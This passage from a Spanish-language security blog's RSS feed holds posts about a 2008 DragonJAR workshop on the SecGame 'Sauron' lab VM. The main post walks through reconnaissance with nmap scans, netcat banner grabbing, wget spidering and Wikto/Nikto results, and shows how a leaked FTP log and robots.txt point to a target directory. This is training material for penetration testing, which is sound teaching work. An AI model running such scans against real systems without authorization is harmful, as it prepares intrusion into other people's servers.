		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la segunda entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 1 publicado por<a href="http://www.sg6.es/labs/" target="_blank"> <strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50821791/94bfa723/H_ack_Taller_DragonJAR_SECGAME_02.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org)</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank">NetCat</a><br />
<a href="http://www.4shared.com/file/50822044/4681948a/nmap-465-setup.html" target="_blank">Nmap</a><br />
<a href="http://www.4shared.com/file/50822127/88100881/wikto_v202924-24997.html" target="_blank">Wikto</a><br />
<a href="http://www.4shared.com/file/50822071/1dc633c6/wgetwin-1_5_3_1-binary.html" target="_blank">Wget</a><br />
<a href="http://www.4shared.com/file/50825998/689fa5da/dotnetfx.html" target="_blank">.Net Framework 2.0</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Nmap" target="_blank">Nmap</a> &#8211; <a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a> &#8211; <a href="http://www.baxware.com/wikto.htm" target="_blank">Wikto</a> &#8211; <a href="http://es.wikipedia.org/wiki/Wget" target="_blank">Wget</a> &#8211; <a href="http://es.wikipedia.org/wiki/.NET_Framework" target="_blank">.Net Framework</a> &#8211; <a href="http://es.wikipedia.org/wiki/ICMP" target="_blank">ICMP</a> &#8211; <a href="http://www.info-ip.net/ip/Clases-de-direcciones-IP.php" target="_blank">Clases de redes</a> &#8211; <a href="http://es.wikipedia.org/wiki/Ping" target="_blank">Ping</a> &#8211; <a href="http://es.wikipedia.org/wiki/Puerto_%28computaci%C3%B3n%29" target="_blank">Puertos</a> &#8211; <a href="http://es.wikipedia.org/wiki/Subred" target="_blank">Subred</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">Escaneo</a> &#8211; <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211; <a href="http://es.wikipedia.org/wiki/JavaScript" target="_blank">JavaScript</a> &#8211; <a href="http://es.wikipedia.org/wiki/HTTP" target="_blank">HTTP</a> &#8211; <a href="http://www.webtaller.com/google/guia_robots.php" target="_blank">Robots.txt</a> &#8211; <a href="http://www.wikilearning.com/monografia/control_administracion_e_integridad_de_logs-que_es_un_log/3485-2" target="_blank">Logs</a></p>
<p style="text-align: justify;">En este primer nivel, que sirve como toma de contacto con el modelo de resolución, lo primero que haremos será marcar unos objetivos principales, que bien podrán servir tanto para afrontar este reto, como en general para el inicio de cualquier actividad que tenga como finalidad determinar posibles puntos de intrusión en un sistema.</p>
<p><span id="more-78"></span><strong>Los objetivos son los siguientes:</strong></p>
<ul style="text-align: justify;">
<li>Conocer la estructura del sistema y de la red</li>
<li>Conocer la estructura del aplicativo</li>
<li>Buscar ficheros por defecto con información sensible</li>
<li>Analizar la lógica del aplicativo</li>
<li>Determinar los posibles puntos de intrusión</li>
<li>Información sobre Red y Servicios</li>
</ul>
<p>Vamos a comenzar delimitando los sistemas presentes en la red de clase C 192.168.200.0/24 . Para hacerlo, usamos nmap con su modificador –sP ( ICMP Ping ), aunque bien se puede dar la circunstancia de existir sistemas que no contesten a tráfico ICMP.</p>
<p style="text-align: justify;"><strong>&gt; nmap -sP 192.168.200.1-254</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 18:51 Hora estandar romance<br />
Host 192.168.200.1 appears to be up.<br />
Host www.blindware.inc (192.168.200.2) appears to be up.<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)<br />
Nmap finished: 254 IP addresses (2 hosts up) scanned in 17.016 seconds</em></p>
<p>Por ello, una comprobación también es interesante es verificar directamente algunos puertos típicos, haciendo uso de tráfico TCP, sin usar comprobación previa por ICMP. Por ejemplo lo podemos hacer con el modificador –P0 –p 80, indicando así que no se envíe un “ping” previo, y que se compruebe el puerto 80/tcp.</p>
<p>En nuestro caso concreto, y dado que directamente parece que no existe ningún otro host activo en esa subred, escanearemos la IP 192.168.200.2. Podremos escanear por defecto, eliminando el modificador “-p”, algunos puertos concretos o escanearlos todos “-p 1-65535”. Un detalle importante que siempre debemos recordar es que cuando marcamos un escaneo –sS o –sT, o sin tipo, únicamente escaneamos puertos TCP, los puertos UDP deben escanearse con el modificador –sU. En nuestro caso este ha sido el resultado.</p>
<p><strong>&gt; nmap -P0 -sS -p 22,23,25,80,110,443,3306 192.168.200.2</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 19:02 Hora estßndar romance<br />
Interesting ports on www.blindware.inc (192.168.200.2):<br />
PORT STATE SERVICE<br />
22/tcp filtered ssh<br />
23/tcp filtered telnet<br />
25/tcp filtered smtp<br />
80/tcp open http<br />
110/tcp filtered pop3<br />
443/tcp open https<br />
3306/tcp filtered mysql<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)</em></p>
<p>Nmap finished: 1 IP address (1 host up) scanned in 0.360 seconds</p>
<p>De esta verificación obtenemos que existen 2 puertos abiertos en ese sistema: 80 y 443, en un principio coorrespondientes a tráfico http y https. Existe otro modificador que nos puede dar más información sobre estos puertos: –sV</p>
<p><strong>&gt; nmap -sV -p 80,443 192.168.200.2</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 19:14 Hora estandar romance<br />
Interesting ports on www.blindware.inc (192.168.200.2):<br />
PORT STATE SERVICE VERSION<br />
80/tcp open http Apache httpd 2.2.4 ((Fedora))<br />
443/tcp open ssl OpenSSL<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)</em></p>
<p>Nmap finished: 1 IP address (1 host up) scanned in 6.719 seconds</p>
<p>Llegados a este punto, podemos decir que si bien podemos seguir haciendo un uso más intensivo de herramientas de red, para nuestros propósitos hemos conseguido establecer la existencia de un sistema activo en la subred determinada, el cual cuenta con 2 puertos TCP abiertos, sobre los que ofrece servicio http y https.</p>
<p><strong>Información sobre el Servidor Web</strong></p>
<p>¿Cuál es nuestro segundo objetivo? Como dijimos inicialmente, familiarizarnos con toda la estructura del aplicativo web. ¿Por qué? Primero, porque en el sistema activo para la subred 192.168.200.0/24, no parecen existir otro tipo de servicios. Además de ello, debemos tener muy presente, que en la actualidad y de forma mayoritaria, la inseguridad se ha ido desplazando desde los servicios y elementos de red, a las aplicaciones web sobre el servicio http/https. Por tanto, a pesar de que pudieran existir otros servicios, sobre el aplicativo web, siempre que exista, incidiremos con especial detalle.</p>
<p>Una conexión directa haciendo uso de netcat, y una petición al servicio web nos muestra la siguiente información:</p>
<p><strong>&gt; nc 192.168.200.2 80<br />
HEAD / HTTP/1.0</strong></p>
<p><em>HTTP/1.1 200 OK<br />
Date: Thu, 05 Jul 2007 19:20:20 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
X-Powered-By: PHP/5.1.6<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8</em></p>
<p>A todos los efectos, esto nos sirve para comprobar que se tratan de versiones actualizadas de Apache y de PHP y que por tanto, las vulnerabilidades existentes, como suele ser común, no residen en los servicios de red, sino que deberemos buscarlas dentro del aplicativo web.</p>
<p>Lo siguiente que debemos hacer es obtener información sobre el árbol web. Desde aquí recomendamos que el spidering ( nombre que comúnmente recibe esta técnica ) se realice sin usar aplicativos integrados en el navegador, pues algunos tienen la mala costumbre de interpretar código javascript pudiendo hacer que obviemos detalles importantes debido a la automatización del proceso. Wget o httrack son unas herramientas muy válidas para la tarea.</p>
<p><strong>&gt; wget -r http://www.blindware.inc</strong><br />
–19:28:15– http://www.blindware.inc/<br />
=&gt; `www.blindware.inc/index.html’<br />
Resolving www.blindware.inc… 192.168.200.2<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: unspecified [text/html]</p>
<p>[ &lt;=&gt; ] 24 –.–K/s</p>
<p>19:28:15 (1.02 MB/s) &#8211; `www.blindware.inc/index.html’ saved [24]</p>
<p>Loading robots.txt; please ignore errors.<br />
–19:28:15– http://www.blindware.inc/robots.txt<br />
=&gt; `www.blindware.inc/robots.txt’<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: 33 [text/plain]</p>
<p>100%[====================================&gt;] 33 –.–K/s</p>
<p>19:28:15 (1.12 MB/s) &#8211; `www.blindware.inc/robots.txt’ saved [33/33]</p>
<p>–19:28:15– http://www.blindware.inc/load.js<br />
=&gt; `www.blindware.inc/load.js’<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: 76 [application/x-javascript]</p>
<p>100%[====================================&gt;] 76 –.–K/s</p>
<p>19:28:15 (2.30 MB/s) &#8211; `www.blindware.inc/load.js’ saved [76/76]</p>
<p>FINISHED –19:28:15–<br />
Downloaded: 133 bytes in 3 files</p>
<p>Ese es el resultado inicial para http://www.blindware.inc. Si lo repetimos sobre http://intranet.blindware.inc no obtendremos nada porque nos pide autenticación, y por el momento la desconocemos. Por último, si lo llevamos a cabo sobre el servicio HTTPS, https://www.blindware.inc o https://intranet.blindware.inc obtenemos un index.html en blanco.</p>
<p>De esto concluimos que, al menos, se están sirviendo 3 escenarios diferentes. Uno por HTTP para www.blindware.inc, otro por HTTP para intranet.blindware.inc y por último, lo que parece uno común por HTTPS que sirve un index.html en blanco.</p>
<p><strong>Vamos a verificar qué contienen los ficheros descargados:</strong></p>
<p><strong>&gt; type index.html</strong><br />
script src=”load.js”&gt;</p>
<p><strong>&gt; type load.js</strong><br />
// document.location.href=’data/0.html’<br />
Document.location.href=’web/0.html’;</p>
<p><strong>&gt; type robots.txt</strong><br />
User-agent: *<br />
Disallow: /data/</p>
<p>Como podemos comprobar desde el fichero index.html existe una llamada a un fichero con contenido javascript (load.js) el cual tiene como misión redirigir el tráfico hacia la web principal. Nos debemos percatar, que existe una línea comentada dentro de este fichero, la cual nos da información sobre una ruta diferente a la habitual data/0.html. Así mismo dentro del fichero robots.txt volvemos a encontrar una referencia a esta ruta. Si continuamos descargando contenidos desde web/0.html comprobamos que únicamente se descarga contenido estático en html.</p>
<p>Así que hasta el momento, y como conclusión, sabemos que existe una carpeta web/, la cual no parece contener nada reseñable, más que el contenido estático del site, y la carpeta data/, sobre la cual hablaremos más adelante.</p>
<p><strong>Vulnerabilidades y Ficheros Sensibles</strong></p>
<p>A continuación, debemos determinar ficheros, configuraciones, o posibles fallos conocidos en el servicio web. Para esta tarea existen numerosas aplicaciones, desde AppScan, a Nikto, o su port a Win32, Wikto. Nosotros vamos a utilizar este último, concretamente sus funciones destinadas a la exploración de contenido backend, cuya finalidad es extraer mediante una exploración por diccionario carpetas y ficheros ocultos, así como la propia utilidad Nikto, que nos escaneará la web buscando vulnerabilidades conocidas. Advertencia: El uso de herramientas automatizadas puede provocar falsos positivos, que debemos comprobar antes de emitir cualquier tipo de valoración.</p>
<p><strong>Los resultados de la ejecución de Wikto son los siguientes:</strong></p>
<p><strong>BackEnd</strong></p>
<p><strong>#Directories</strong><br />
www.blindware.inc/<br />
www.blindware.inc/cgi-bin/<br />
www.blindware.inc/data/<br />
www.blindware.inc/error/<br />
www.blindware.inc/data/stats/<br />
www.blindware.inc/error/include/<br />
<strong>#Indexable</strong><br />
www.blindware.inc/data/<br />
<strong>#Files</strong><br />
www.blindware.inc/index.php<br />
www.blindware.inc/robots.txt</p>
<p><strong>Nikto</strong></p>
<p>/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000<br />
/index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42<br />
/index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42<br />
/WS_FTP.LOG</p>
<p><strong>De esta información podemos obtener los siguientes datos relevantes:</strong></p>
<ul style="text-align: justify;">
<li>La existencia de un directorio /data/stats</li>
<li>La existencia de un fichero WS_FTP.LOG</li>
<li>La existencia de un fichero robots.txt</li>
<li>Información sobre PHP</li>
</ul>
<p style="text-align: justify;">Un paseo por la aplicación visible, podemos hacerlo con Paros por ejemplo, nos desvela que, a priori, los que vemos es un contenido pre-generado de forma estática y cuya única entrada de datos se encuentra en el formulario contacto. Podemos analizarlo, pero no vamos a encontrar ningún comportamiento anómalo, ya que si nos damos cuenta el campo “action” de ese formulario va en blanco. Esto nos debe hacer pensar, que en caso de existir partes vulnerables, no se encuentran accesibles al público directamente.</p>
<p>Como información adicional decir que muchos gestores de contenido, entre ellos los más robustos, generan el contenido de forma estática desde un aplicativo en backend, haciendo que la parte visible de la aplicación carezca, casi por completo, de contenido dinámico, y de entradas por parte del usuario. Existirán por el contrario, otros aplicativos, como foros, buscadores, o secciones de prensa, cuyo contenido utilice generación dinámica. En estos casos, deberemos probar la inclusión sobre sus parámetros de código SQL, código HTML, código PHP, etc. buscando un comportamiento extraño.</p>
<p><strong>Busqueda de un Punto de Intrusión</strong></p>
<p>Para buscar un punto de intrusión, debemos recopilar lo que sabemos hasta el momento, ordenar las ideas y tomar una decisión, que vaya por delante, no tiene porqué ser la correcta. Dicho de otra forma, todo lo realizado hasta el momento nos lleva a suposiciones plausibles, pero nada nos garantiza que estemos en lo cierto. Vamos a ver lo que sabemos:</p>
<p><strong>1. </strong>Existen 3 contenidos diferentes servidos por el servidor web<br />
<strong>1. </strong>http://www.blindware.inc ( En adelante www )<br />
<strong>2. </strong>http://intranet.blindware.inc ( En adelante intranet )<br />
<strong>3. </strong>https://www.blindware.inc y https://intranet.blindware.inc ( En adelante https )<br />
<strong>2. </strong>El contenido de https que podemos revisar con Wikto no parece contener nada.<br />
<strong>3. </strong>Intranet nos pide autenticación para acceder.<br />
<strong>4. </strong>En www conocemos que:<br />
<strong>1. </strong>Tanto por la información pública existente, como por Wikto, existen sendos directorios de nombre data/ y data/stats/<br />
<strong>2. </strong>Wikto nos revela la existencia del fichero WS_FTP.LOG</p>
<p><strong>Antes de continuar debemos revisar el fichero WS_FTP.LOG:</strong></p>
<p>2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/index.php<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd0.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd1.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd2.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd3.log</p>
<p><strong>Con lo cual, parece que tenemos 2 opciones:</strong></p>
<p>1. Atacar la autenticación de intranet<br />
2. Intentar acceder en WWW a data/stats/ ( y a lo que parecen ser logs )</p>
<p>Aquí hay que decidir, en este caso, sobre intranet no sabemos absolutamente nada, mientras que sobre data/stats/ al menos sabemos que el día 8 de Mayo de 2007, contenía algún tipo de fichero de logs.</p>
<p>Evidentemente cada uno puede buscar lo que prefiera, y dónde prefiera, pero en este caso, los LOGS pueden resultar una información de vital interés pues pueden desvelarnos partes ocultas del aplicativo, y otras áreas de las que no tenemos conocimiento, así como usuarios con los que se accede a ellas ( si el acceso se hace autenticado mediante apache ) y otros muchos detalles.</p>
<p>Por el contrario, atacar directamente una autenticación de Apache, salvo que esté incorrectamente configurada, es algo bastante poco probable de llevar a buen fin, porque a priori, únicamente podremos atacar por fuerza bruta.</p>
<p>Con esto podemos concluir el primer nivel, habiendo visto las siguientes vulnerabilidades relativas a la “publicación de información sensible”:</p>
<ul style="text-align: justify;">
<li>En los comentarios del fichero “load.js” se filtra información</li>
<li>El fichero robots.txt mal facilita información relativa a áreas del aplicativo no públicas</li>
<li>Existen el WS_FTP.LOG conteniendo información sensible</li>
<li>El servidor Apache, está incorrectamente configurado, permite, mediante la opción INDEXES, la navegación por aquellos directorios que no contienen un fichero índice.</li>
</ul>
<p style="text-align: justify;">Así mismo tenemos un objetivo para iniciar nuestro ataque: el directorio data/stats/ terminando así el primer nivel de Sauron. Este primer nivel es igual para ambos niveles de complejidad.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Solución y seguimiento del HackTaller 01 DragonJAR (I de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:31:53 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Auditoría]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=76</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Gracias a todas las personas que asistieron a este primer HackTaller de la Comunidad DragonJAR.</p>
<p style="text-align: justify;">Ya muchos de los participantes están dejando sus comentarios y anécdotas del encuentro en el foro de la Comunidad (<a href="http://foro.dragonjar.us/hacktaller_01_en_medellin-t27830.0.html" target="_blank">Foro HackTaller</a>)</p>
<p style="text-align: justify;">Aquí tenemos la primera galería de imágenes del HackTaller (<a href="http://www.flickr.com/photos/23466734@N07/show/" target="_blank">ver galería</a>)</p>
<p style="text-align: justify;">Desde hoy empezaré a publicar los recursos utilizados para llevar a cabo este primer HackTaller de la Comunidad DragonJAR.</p>
<p style="text-align: justify;">El ambiente virtualizado de intrusión utilizado para este HackTaller es el recurso que había publicado en la Web principal de la Comunidad (<a href="http://www.dragonjar.org/secgame-1-sauron.xhtml" target="_blank">SecGame: Sauron</a>)</p>
<p style="text-align: justify;">Desde hoy publicaré cada nivel de solución en formato de video (sin sonido).<br />
Para quienes quieran ir a un ritmo más rápido pueden hacer uso del documento en pdf del solucionario publicado por la gente de <a href="http://www.sg6.es/labs/" target="_blank">SG6 Labs</a>.<br />
A <a href="http://www.sg6.es/labs/" target="_blank">SG6</a> Labs muchas gracias por la publicación de este magnífico recurso.</p>
<p style="text-align: justify;"><span id="more-76"></span>SecGame es un proyecto diseñado por <a href="http://www.sg6.es/labs/" target="_blank">SG6 Labs</a> para el desarrollo de entornos que permitan la simulación de test de intrusión adaptados a escenarios reales.<br />
Estos entornos permiten no sólo la adquisición de habilidades, sino también la evaluación de las mismas, tanto dentro de los estrictamente conocimientos prácticos, como de las metodologías aplicadas al escenario.<br />
Dentro de los entornos a desarrollar se recogerán las principales necesidades del campo de la auditoría técnica de seguridad informática: revisión de aplicativo web, revisión de servicios, revisión de código, revisión de sistemas de gestión de bases de datos, revisión de configuraciones y políticas de seguridad, entre otras, intentando en cada entorno que dentro de su completitud, focalice las problemáticas más típicas de cada uno de los escenarios.</p>
<p style="text-align: justify;"><strong>Objetivos</strong></p>
<ul style="text-align: justify;">
<li>Proporcionar un entorno de simulación para la auditoria técnica de sistemas de información que permita el aprendizaje y la mejora de habilidades.</li>
<li>Desarrollar un entorno de simulación basado en casos y escenarios reales de sistemas, sin que exista separación física de niveles, permitiendo un mayor realismo en la explotación de los entornos.</li>
<li>Dotar de una relación extensa de escenarios bajo unos sistemas heterogéneos que permitan la revisión de un conjunto amplio de casos interrelacionados entre sí.</li>
<li>Permitir la revisión de aplicativo web desarrollado en múltiples lenguajes, mostrando diversos errores en la codificación del mismo.</li>
<li>Permitir la revisión de configuraciones de servicios, mostrando diferentes niveles de securizacion, y su impacto sobre los sistemas.</li>
<li>Permitir la revisión de servicios inseguros, mostrando errores comunes y fallos de seguridad en los mismos.</li>
<li>Permitir la revisión de código fuente inseguro, mostrando errores comunes y fallos de seguridad en el mismo.</li>
<li>Permitir la revisión de sistemas de gestión de bases de datos, mostrando errores típicos en el acceso a los mismos, y errores de gestión y configuración.</li>
<li>Innovar en el área de los aplicativos destinados a la preparación de test de intrusión haciendo uso de la vitalización y las posibilidades de red que ofrecen estos entornos.</li>
</ul>
<p style="text-align: justify;"><a href="http://www.4shared.com/get/50684587/20276eda/H_ack_Taller_DragonJAR_SECGAME_01.html" target="_blank"><strong>Video tutorial de instalación del ambiente virtualizado de intrusión en Windows</strong></a> (Password: www.dragonjar.org).<br />
Recursos necesarios:</p>
<ul style="text-align: justify;">
<li><span style="font-weight: bold;">SecGame #1 Sauron: Máquinas virtuales (cualquiera de las dos versiones)</span>
<ul>
<li><a href="http://www.secgame.org/downloads/sauron.rar" target="_blank">Descargar máquina virtual Sauron</a> (530MB. Dificultad Normal)</li>
<li><a href="http://www.secgame.org/downloads/sauron-hard.rar" target="_blank">Descargar máquina virtual Sauron</a> (519MB. Dificultad Alta)</li>
</ul>
</li>
<li><span style="font-weight: bold;">Binarios para Windows</span>
<ul>
<li><a href="http://www.secgame.org/downloads/setupqemuk40.exe" target="_blank">Qemu Manager 4.0</a></li>
<li><a href="http://www.secgame.org/downloads/openvpn-2.0.9-install.exe" target="_blank">OpenVPN 2.0.9</a></li>
</ul>
</li>
</ul>
<p style="text-align: justify;"><strong><a href="http://www.4shared.com/file/50714852/2b77c69f/SecGame.html" target="_blank">Solucionario en formato pdf</a> </strong>(password: www.dragonjar.org)<br />
<strong><a href="http://www.4shared.com/file/19342817/58b92e87/Gua_de_Pruebas_OWASP_v20.html" target="_blank">Documentación de interés</a></strong> &#8211; Guía de pruebas OWASP (password: www.dragonjar.org)<br />
<a href="http://es.wikipedia.org/wiki/Virtualizaci%C3%B3n" target="_blank"><strong>Virtualización</strong></a><br />
<strong><a href="http://es.wikipedia.org/wiki/QEMU" target="_blank">Qemu</a></strong><br />
<a href="http://es.wikipedia.org/wiki/Red_privada_virtual" target="_blank"><strong>VPN</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>HackTaller 01 en Medellín &#8211; (Realizado)</title>
		<link>http://labs.dragonjar.org/hacktaller-01-en-medellin-realizado</link>
		<comments>http://labs.dragonjar.org/hacktaller-01-en-medellin-realizado#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:29:42 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Brute Force]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Enumeración]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=74</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El próximo sabado 7 junio se llevará a cabo, el primer HackTaller en la ciudad de Medellín con los miembros de la <a href="http://foro.dragonjar.us/" target="_blank">Comunidad DragonJAR</a> de esta ciudad.</p>
<p style="text-align: justify;">El laboratorio pretende ofrecer a los interesados en la materia un taller personalizado sobre seguridad informática. Dejando de lado el típico wargame donde cada uno va por su lado, excluyendo a los principiantes con deseos de aprender.</p>
<p style="text-align: justify;">El tema para este primer HackTaller será una nivelación de conocimientos mediante un Test de Intrusión de un Aplicativo Web. No se requiere un nivel de conocimientos avanzados en temas de seguridad, más si en informática en general, nociones básicas de seguridad, programación, linux y principalmente muchos deseos de aprender y compartir conocimiento.</p>
<p style="text-align: justify;"><span id="more-74"></span>En el HackTaller se llevará a cabo un test de intrusión desde cero a un sistema virtualizado, haciendo el paso a paso de cada una de las diferentes fases necesarias para este proceso:</p>
<ul style="text-align: justify;">
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-part-i" target="_blank">Identificación de banners</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-i" target="_blank">Enumeración del objetivo</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">Escaneo</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">Ataques de fuerza bruta</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Escaneo de vulnerabilidades</a></li>
<li><a href="http://www.dragonjar.org/programacion-segura" target="_blank">Análisis de código fuente</a></li>
<li>Injecciones de código y archivos</li>
<li>Explotación de vulnerabilidades</li>
<li>etc</li>
</ul>
<p style="text-align: justify;">Se recomienda además leer los laboratorios que se han publicado en la página, donde se dan algunas definiciones importantes y necesarias para el HackTaller, y donde se hace uso de algunas herramientas imprescindibles para este tipo de prácticas.</p>
<ul style="text-align: justify;">
<li>BackTrack</li>
<li>NetCat</li>
<li>Nmap &#8211; Nmapfe</li>
<li>Hydra</li>
<li>etc</li>
</ul>
<p style="text-align: justify;">El lugar donde se realizará el HackTaller será en la sede oficial de los Laboratorios de la Comunidad DragonJAR, <a href="http://www.netmaniavirtual.com/" target="_blank">Netmania Media Group</a>.</p>
<p style="text-align: justify;"><strong>Hora:</strong> 2 pm<br />
<strong>Valor:</strong> 1.000 pesos la hora por el servicio de computadores disponibles (este precio es el acordado por el administrador del local comercial), el HackTaller se llevará en un mínimo de 5 horas.<br />
<strong>Materiales:</strong> Deseos de aprender y compartir</p>
<p style="text-align: justify;"><strong>Notas aclaratorias: </strong>El local comercial ofrece servicios de internet a usuarios regulares, por ello se estableció cobrar las horas en que haremos uso de las máquinas. En ningún momento, yo (<a href="http://foro.dragonjar.us/profiles/4v4t4r-u90.html" target="_blank">4v4t4r</a>), o la Comunidad DragonJAR busca algún tipo de lucro económico con este HackTaller.</p>
<p style="text-align: justify;">Las máquinas, con los sistemas virtualizados, la documentación y las memorias del HackTaller, quedan abiertas y disponibles al público en general para que realicen el laboratorio en los horarios de servicio del local comercial (Lunes a Sabado de 9 am a 10 pm).</p>
<p style="text-align: justify;"><strong>IMPORTANTE:</strong><br />
Es necesario realizar previa inscripción al HackTaller enviando un correo electrónico a 4v4t4r@gmail.com (nombre o nick, e-mail de contacto)</p>
<p style="text-align: justify;">Los cupos son bastante limitados así que para este primer HackTaller se tendrá preferencia para usuarios activos de la Comunidad. Además dependiendo de la cantidad de pre-inscritos se considerará hacer dos sesiones, una por la mañana con un grupo de usuarios y una por la tarde con otro grupo.</p>
<p style="text-align: justify;"><strong>Ubicación:</strong></p>
<p style="text-align: justify;">
<p style="text-align: center;"><a href="http://img528.imageshack.us/img528/6034/netmania2px8.jpg"><img class="aligncenter" src="http://img528.imageshack.us/img528/6034/netmania2px8.th.jpg" alt="" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-01-en-medellin-realizado/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

